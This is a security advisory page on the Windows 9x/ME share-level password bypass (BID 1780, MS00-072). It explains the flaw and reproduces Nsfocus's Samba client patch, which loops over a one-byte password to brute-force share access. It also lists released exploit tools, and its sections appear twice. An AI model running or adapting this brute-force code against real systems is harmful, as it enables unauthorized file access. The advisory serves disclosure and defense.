Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability
BID:1780
Info
Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability
| Bugtraq ID: | 1780 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 10 2000 12:00AM |
| Updated: | Oct 10 2000 12:00AM |
| Credit: | Discovered by the Nsfocus Security Team and publicized in a Microsoft Security Bulletin (MS00-072) on October 10, 2000. |
| Vulnerable: |
Microsoft Windows ME Microsoft Windows 98SE Microsoft Windows 98 Microsoft Windows 95 |
| Not Vulnerable: |
Microsoft Windows NT 4.0 Microsoft Windows 2000 Professional |
Discussion
Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability
Share level password protection for the File and Print Sharing service in Windows 95/98/ME can be bypassed.
Share level access provides peer to peer networking capabilities in the Windows 9x/ME environment. It depends on password protection in order to grant or deny access to resources. Due to a flaw in the implementation of File and Print Sharing security, a remote intruder could access share level protected resources without entering a complete password by programatically modifying the data length of the password.
The flaw is due to the NetBIOS implementation in the password verification scheme share level access utilizes.
The password length is compared to the length of data sent during the password verification process. If the password was programatically set to be 1 byte, then only the first byte would be verified. If a remote attacker was able to correctly guess the value of the first byte of the password on the target machine, access would be granted to the share level protected resource.
Windows 9x remote administration is also affected by this vulnerability because it uses the same authentication scheme.
Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share.
Share level password protection for the File and Print Sharing service in Windows 95/98/ME can be bypassed.
Share level access provides peer to peer networking capabilities in the Windows 9x/ME environment. It depends on password protection in order to grant or deny access to resources. Due to a flaw in the implementation of File and Print Sharing security, a remote intruder could access share level protected resources without entering a complete password by programatically modifying the data length of the password.
The flaw is due to the NetBIOS implementation in the password verification scheme share level access utilizes.
The password length is compared to the length of data sent during the password verification process. If the password was programatically set to be 1 byte, then only the first byte would be verified. If a remote attacker was able to correctly guess the value of the first byte of the password on the target machine, access would be granted to the share level protected resource.
Windows 9x remote administration is also affected by this vulnerability because it uses the same authentication scheme.
Successful exploitation of this vulnerability could lead to the retrieval, modification, addition, and deletion of files residing on a file or print share.
Exploit / POC
Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability
Nsfocus <[email protected]> has released the following proof-of-concept code:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Björn Stickler <[email protected]> has released the following sharehack2.zip for the password verfication exploit discovered by Nsfocus Security Team. The program hacks every win9x/me share password in less than 2 minutes, 10 minutes for internet (c sourcecode included)
Gabriel Maggiotti <[email protected]> has provided the following exploit:
netbios.tar.gz
Nsfocus <[email protected]> has released the following proof-of-concept code:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Björn Stickler <[email protected]> has released the following sharehack2.zip for the password verfication exploit discovered by Nsfocus Security Team. The program hacks every win9x/me share password in less than 2 minutes, 10 minutes for internet (c sourcecode included)
Gabriel Maggiotti <[email protected]> has provided the following exploit:
netbios.tar.gz